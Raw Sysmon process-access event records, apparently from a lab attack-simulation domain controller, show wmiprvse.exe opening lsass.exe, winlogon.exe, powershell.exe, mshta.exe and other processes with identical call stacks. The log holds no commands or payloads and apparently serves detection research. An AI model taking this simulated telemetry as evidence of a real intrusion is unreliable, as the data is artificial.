15:59:30.147{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4986-6008-0C00-00000000A301}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025286Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.147{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4985-6008-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025285Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.147{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4984-6008-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025284Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.116{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5361-6008-5806-00000000A301}4104C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025283Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.116{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5361-6008-5706-00000000A301}6288C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025282Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.116{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5361-6008-5606-00000000A301}3356C:\Windows\System32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025281Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.116{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5359-6008-4306-00000000A301}4856C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025280Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.116{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5357-6008-3E06-00000000A301}6760C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025279Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.116{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5356-6008-3906-00000000A301}4832C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025278Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.116{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5354-6008-3406-00000000A301}6596C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025277Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.116{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5353-6008-2F06-00000000A301}3716C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025276Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.116{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025275Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.116{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025274Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.116{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025273Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.116{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025272Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.116{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025271Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.116{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025270Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.116{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025269Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.100{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025268Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:30.100{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000025267Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 